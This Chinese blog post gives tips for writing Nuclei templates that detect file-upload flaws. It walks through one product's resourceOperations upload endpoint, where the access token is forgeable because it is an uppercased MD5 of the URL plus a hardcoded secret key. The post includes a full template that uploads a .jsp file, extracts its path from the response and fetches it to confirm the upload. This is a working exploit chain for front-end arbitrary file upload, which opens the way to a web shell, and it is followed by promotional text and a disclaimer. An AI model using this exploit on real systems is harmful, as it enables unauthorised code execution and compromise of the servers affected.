前言

Nuclei对于文件上传类型Poc编写小Tips

平台

ProjectDiscovery Cloud Platform:
https://cloud.projectdiscovery.io/
JsonPath:
https://jsonpath.com/
Json解析：
在线json解析平台即可

案例

某康resourceOperations upload接口存在前台上传
具体接口：
POST /eps/api/resourceOperations/upload?token=xxx HTTP/1.1

分析

token为 32位MD5大写，即
MD5(https://target.com/eps/api/resourceOperations/uploadsecretKeyIbuilding)转大写

Resp返回path如下：

{"success":true,"message":"上传附件成功","data":{"uuid":null,"resourceUuid":"9abf316d58xxxxx25460b9358c91","resourceType":9998,"operationType":999,"extAttrs":"{\"fileName\":\"1.jsp\",\"fileSize\":\"0.00KB\"}","pUuid":null,"isOn":null,"resourceName":"1.jsp","resourceSize":"0.00KB","unitName":null,"regionName":null}}

完整path：https://target.com/eps/upload/resourceUuid值.jsp

Nuclei for Poc

variables:boundary: "{{rand_base(20)}}"Token: '{{to_upper("{{md5("https://{{Hostname}}/eps/api/resourceOperations/uploadsecretKeyIbuilding")}}")}}'

path提取

demo:

http:- raw:- |-POST /eps/api/resourceOperations/upload?token={{Token}} HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988Content-Type: multipart/form-data;boundary={{boundary}}Upgrade-Insecure-Requests: 1Content-Length: 174--{{boundary}}Content-Disposition: form-data; name="fileUploader";filename="1.jsp"Content-Type: image/jpeg123456--{{boundary}}- |-GET /eps/upload/{{plt}}.jsp HTTP/1.1Host: {{Hostname}}extractors:- type: jsonpart: bodyname: pltinternal: truejson: - '.data.resourceUuid'matchers-condition: andmatchers:- type: dsldsl:- contains_all(body_2,"123456") && status_code==200

更多网络安全优质免费学习资料与干货教程＋

送渗透工具、技术文档、书籍，面试题、视频（基础到进阶。环境搭建，HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等）、应急响应笔记、学习路线。

申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。